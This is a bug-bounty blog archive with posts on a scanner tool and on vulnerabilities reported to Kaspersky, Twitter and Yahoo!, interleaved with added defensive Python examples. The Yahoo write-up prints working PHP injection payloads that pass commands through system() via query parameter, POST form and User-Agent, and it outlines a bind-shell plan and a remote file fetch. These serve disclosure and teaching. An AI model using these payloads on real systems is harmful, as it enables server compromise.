Posts by: zigoo

Yahoo! RCE Detector WebPwn3r Released.


Hello Everyone,

Today's blog post is about WebPwn3r 🙂

For those who have never heard about WebPwn3r, let me introduce it to you.

WebPwn3r is a web application security scanner written in Python that helps security researchers scan multiple links at the same time for Remote Code/Command Execution and XSS vulnerabilities.

You can extract the URLs from Burp Suite, save them in list.txt and then pass the file to WebPwn3r.

You can also use your own crawler to gather URLs for a certain domain or for random domains, save them in list.txt and then pass the file to WebPwn3r.

In its public demo version, WebPwn3r has the features below:

1- Scan a URL or a list of URLs.
2- Detect and exploit Remote Code Injection vulnerabilities.
3- Detect and exploit Remote Command Execution vulnerabilities.
4- Detect and exploit typical XSS vulnerabilities.
5- Detect the WebKnight WAF.
6- Improved payloads to bypass security filters/WAFs.
7- Fingerprint the backend technologies.

The tool is under heavy development 🙂

Demo Video for the tool:

Success Stories:


To download the Tool:

https://github.com/zigoo0/webpwn3r

Kaspersky.com Unvalidated Redirection Vulnerability.


Would you trust a link from your security vendor? Absolutely yes! But imagine your security vendor is asking you to download malware!

During my research on Kaspersky.com I found an "Unvalidated Redirection Vulnerability" that could be used by attackers to trick Kaspersky.com users into visiting malicious web sites!

To demonstrate the impact of such vulnerabilities I made a video simulating a black-hat method of using this vulnerability to spread malware.

Video POC:

The consequences of leaving such a vulnerability unfixed are critical:
  • Wide infection, since the redirection comes from a trusted source, especially if the attacker registered a domain name similar to Kaspersky.com.
  • Very bad reputation for the Kaspersky company.
  • Your most trusted resource, "your antivirus", will be your worst enemy! Would you trust anything else?
And many other consequences. The vulnerability was reported to the Kaspersky web team and is now fixed.

Twitter.com Unrestricted File Upload Vulnerability.


Critical vulnerability in Twitter allows an attacker to upload unrestricted files
Hello,

Twitter acknowledged me on their Hall of Fame for finding and reporting two vulnerabilities in their web site.

Those two vulnerabilities are:

1- Unrestricted File Upload Vulnerability.

The POC:

An Unrestricted File Upload vulnerability occurs when an application does not validate, or improperly validates, file types before uploading files to the system.
Such flaws allow an attacker to upload and execute arbitrary code on the target system, which could result in execution of arbitrary HTML and script code or full system compromise.
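As an added example (not code from this post, and unrelated to how Twitter's own upload handling works), here is a Python upload validator showing the checks the definition above calls for: an extension allowlist, a file name with a single extension and no path components, a content check via magic bytes, a size cap, and a server-chosen stored name. The allowlist, the 5 MiB cap and the sample files are constructed for the example.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes a file of that type must start with.
# Constructed allowlist for this example; a real service tailors it to what it
# actually needs to accept.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 5 * 1024 * 1024  # assumed policy value: 5 MiB

# <stem>.<ext> with exactly one dot, so "shell.php.png" and "cat.png\x00.php"
# both fail this pattern.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")


class UploadRejected(ValueError):
    """Raised when an upload fails one of the validation checks."""


def validate_upload(filename: str, data: bytes) -> str:
    """Validate one upload and return the name it should be stored under.

    The client-supplied name is used only to read the extension; the stored
    name is random, so the client never chooses where the file lands.
    """
    if not data or len(data) > MAX_SIZE:
        raise UploadRejected("empty or oversized upload")

    # Reject anything carrying path components ("../x.png", "C:\x.png").
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base != filename:
        raise UploadRejected("path components are not allowed in file names")

    m = NAME_RE.fullmatch(base)
    if m is None:
        raise UploadRejected("file name must be <stem>.<ext> with a single extension")
    ext = m.group(1).lower()

    signatures = ALLOWED_TYPES.get(ext)
    if signatures is None:
        raise UploadRejected(f"extension .{ext} is not on the allowlist")

    # Check the content, not just the name: a PHP script renamed to .png fails here.
    if not any(data.startswith(sig) for sig in signatures):
        raise UploadRejected(f"content does not match a .{ext} file")

    return f"{secrets.token_hex(16)}.{ext}"


def check_upload(filename: str, data: bytes):
    """Convenience wrapper: (True, stored_name) or (False, reason)."""
    try:
        return True, validate_upload(filename, data)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed sample payloads: minimal headers padded with zero bytes.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 32
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"

if __name__ == "__main__":
    for name, blob in [("cat.png", PNG_SAMPLE), ("photo.JPG", JPEG_SAMPLE),
                       ("shell.php", PHP_SAMPLE), ("shell.php.png", PNG_SAMPLE),
                       ("../../cat.png", PNG_SAMPLE), ("cat.png", PHP_SAMPLE)]:
        print(f"{name!r:20} -> {check_upload(name, blob)}")
```

The content check is the part most upload handlers skip: an extension test alone is defeated by renaming a script, and a Content-Type header is attacker-supplied. Rejecting multiple extensions outright is deliberate; whether a web server treats "x.php.png" as PHP depends on its handler configuration, so the validator does not rely on it.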

2- Unvalidated Redirection Vulnerability.

This vulnerability could be used by attackers to conduct phishing and malware-spreading attacks against Twitter users.
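The Kaspersky finding above and this Twitter finding are the same class of bug: a redirect parameter the application forwards without checking it. As an added example, not the post's code and unrelated to either vendor's site, here is a Python check that accepts only a site-relative path or an absolute http(s) URL whose host is on an allowlist, and falls back to a default location otherwise. The allowlist, the default of "/" and the inputs in the demo are constructed for the example.

```python
from urllib.parse import urlsplit

# Hosts a redirect may legitimately point at. Constructed allowlist for this
# example; a real deployment lists its own domains.
ALLOWED_HOSTS = frozenset({"www.kaspersky.com", "kaspersky.com"})


def resolve_redirect(next_value: str, allowed_hosts=ALLOWED_HOSTS, default: str = "/") -> str:
    """Return next_value if it is a safe redirect target, otherwise `default`.

    Accepted: (a) absolute http(s) URLs whose host is on the allowlist and
    (b) site-relative paths starting with a single "/". Everything else,
    including scheme-relative "//host", "javascript:" URLs, userinfo tricks
    such as "https://good@evil", and backslash variants, falls back.
    """
    if not next_value or any(ord(c) < 0x21 or ord(c) == 0x7F for c in next_value):
        return default  # control characters / whitespace never belong in a Location
    # Browsers treat "\" like "/" in URLs; normalise before parsing so that
    # "/\evil" is seen as the scheme-relative "//evil" it really is.
    candidate = next_value.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
        host = (parts.hostname or "").lower()  # userinfo and port stripped
    except ValueError:  # e.g. malformed IPv6 literal
        return default
    if parts.scheme:
        # "https:/evil" parses with an empty netloc but browsers may still
        # treat it as absolute, so an absolute URL must carry a real host.
        if parts.scheme not in ("http", "https") or not parts.netloc:
            return default
        return candidate if host in allowed_hosts else default
    if parts.netloc:  # scheme-relative: //host/path
        return candidate if host in allowed_hosts else default
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate  # plain site-relative path
    return default


if __name__ == "__main__":
    # Constructed inputs: the first two are legitimate, the rest are the
    # usual ways an open-redirect filter gets bypassed.
    for value in ["/support/downloads", "https://www.kaspersky.com/downloads",
                  "https://evil.example/", "//evil.example/", "/\\evil.example",
                  "https://www.kaspersky.com@evil.example/", "javascript:alert(1)",
                  "https:/evil.example", "https://www.kaspersky.com.evil.example/"]:
        print(f"{value!r:48} -> {resolve_redirect(value)!r}")
```

Matching the host exactly against an allowlist, rather than checking that the string "starts with" or "contains" the trusted domain, is what defeats look-alike hosts and userinfo tricks; a look-alike registered domain is exactly the scenario the Kaspersky post describes.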

Link to Twitter Hall Of Fame:

https://twitter.com/about/security

Yahoo! Remote Command Execution Vulnerability.

Hello Everyone,

This is my first writeup for the blog, which I chose to be about the "Yahoo Remote Code Execution" vulnerability.

The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.

Vulnerability Link:

http://tw.user.mall.yahoo.com/rating/list?sid=$Vulnerability

Payload:

${@print(system("whoami"))}

Note:

The server hosts many other Yahoo! sub-domains!

What is “Remote PHP Code Injection” ?

Simply put, PHPCI occurs when user-supplied (GET/POST) parameter values are reflected inside an eval() function; that vulnerability allows attackers to execute PHP code such as system("id") or any other PHP function/code.


That said, I was able to inject PHP code by manipulating the value of the parameter "sid".

In the beginning I tried to list the directories and files with "dir" using the system function:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("dir"))}


Indeed, I needed a better view, so I tried system("ls -la"). But!?
It didn't work! It does not accept any spaces in the URL!!

What I actually needed was a good proof of concept to explain to the Yahoo! Security Team how dangerous this vulnerability is, given the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue with some tricks, including URL-encoding the space as %20, but it didn't work. Same result with double URL encoding!

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("ls%20-la"))}

I also tried to get around it by using the function file_get_contents("http://sec-down.com/poc.txt"), but this one doesn't work because of the folder permissions. Did you say do it in /tmp?!

I thought of:

1- Upload "bind.sh", which is a bind-connection script, into the /tmp directory.

2- Execute it to make a bind connection with the server,

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("./tmp/bind.sh"))}

3- Receive the connection from the server with Netcat, and then I would be free to run whatever commands 😀

But actually Netcat is a hacking tool! It could also be detected by any simple AV/IDS on the system, and this could corrupt the whole thing!
I had to go for another solution.

Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST['x2']).

POC:

<form method="POST" action="http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST['x2']))}">
<input type="text" name="x2">
<input type="submit"></form>

Also by using system($_SERVER['HTTP_USER_AGENT']) and then injecting my commands inside the User-Agent,
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_SERVER['HTTP_USER_AGENT']))}
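The request shapes in this write-up (the payload in the query string, the double-URL-encoded variant, and the $_POST and User-Agent variants) all leave the same fingerprint in a web server's access log. As an added example, not part of the post, here is a Python scan over constructed Apache combined-format log lines that URL-decodes each request until it stops changing and then looks for PHP syntax that should never appear in a query parameter: the ${...} interpolation form described under "Remote PHP Code Injection", superglobals such as $_POST and $_SERVER, and command-execution functions. The log lines, the client IP 203.0.113.5, the timestamps and the response sizes are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines modelled on the request shapes in the
# write-up. Line 1 is benign; lines 2-5 carry single-encoded, double-encoded,
# $_POST-based and User-Agent-based PHP injection attempts. Not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jan/2014:18:30:01 +0000] "GET /rating/list?sid=12345 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2014:18:31:12 +0000] "GET /rating/list?sid=%24%7B%40print(system(%22whoami%22))%7D HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2014:18:32:45 +0000] "GET /rating/list?sid=%2524%257B%2540print(system(%2522id%2522))%257D HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2014:18:33:09 +0000] "POST /rating/list?sid=%24%7B%40print(system(%24_POST%5B%27x2%27%5D))%7D HTTP/1.1" 200 988 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2014:18:34:50 +0000] "GET /rating/list?sid=%24%7B%40print(system(%24_SERVER%5B%27HTTP_USER_AGENT%27%5D))%7D HTTP/1.1" 200 1330 "-" "ls -la"',
]

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of PHP source being smuggled through a parameter that ends up in eval().
INDICATORS = [
    ("php-curly-syntax", re.compile(r"\$\{\s*@?[A-Za-z_]\w*\s*\(")),            # ${@print( ...
    ("php-superglobal", re.compile(r"\$_(?:GET|POST|REQUEST|SERVER|COOKIE)\s*\[")),
    ("php-exec-function", re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(")),
]


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly so single and double encoding normalise to the same text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line_no: int, line: str) -> list:
    """Return one finding dict per (field, indicator) that matches in this log record."""
    m = LOG_RE.match(line)
    if not m:
        return [{"line": line_no, "field": "raw", "indicator": "unparsed-line", "evidence": line[:80]}]
    findings = []
    fields = {
        "request": decode_fully(m.group("target")),
        "user_agent": decode_fully(m.group("ua")),
    }
    for field, text in fields.items():
        for name, pattern in INDICATORS:
            hit = pattern.search(text)
            if hit:
                findings.append({"line": line_no, "field": field, "indicator": name, "evidence": hit.group(0)})
    return findings


def scan_log(lines) -> list:
    """Scan an iterable of log lines; line numbers are 1-based."""
    findings = []
    for n, line in enumerate(lines, start=1):
        findings.extend(scan_line(n, line))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding until the text stops changing is what makes the single-encoded and double-encoded lines produce identical findings. The User-Agent value on the last line ("ls -la") matches nothing by itself; the tell is the request referencing HTTP_USER_AGENT, so whenever the php-superglobal indicator fires on $_SERVER the analyst should treat the User-Agent of that same record as attacker-controlled input and read it alongside the request.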

Yes, I know there are other good tricks, such as using readfile("/etc/passwd") and many more, but despite the adrenaline I had, as you know, those ideas never come to mind when you need them 😀

Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:

TIMELINE:

Jan 20, 2014 at 6:39 PM – Initial report to the Yahoo! Security Team.

Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo!: the server kernel was an old one with a well-known "Local Privilege Escalation" vulnerability, which means an attacker with such a vulnerability can gain ROOT ACCESS to the server!!!!

Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.


Thanks to Yahoo! Security team for the fast fix release.

BTW No news about the bounty yet!

Follow me: twitter.com/zigoo0
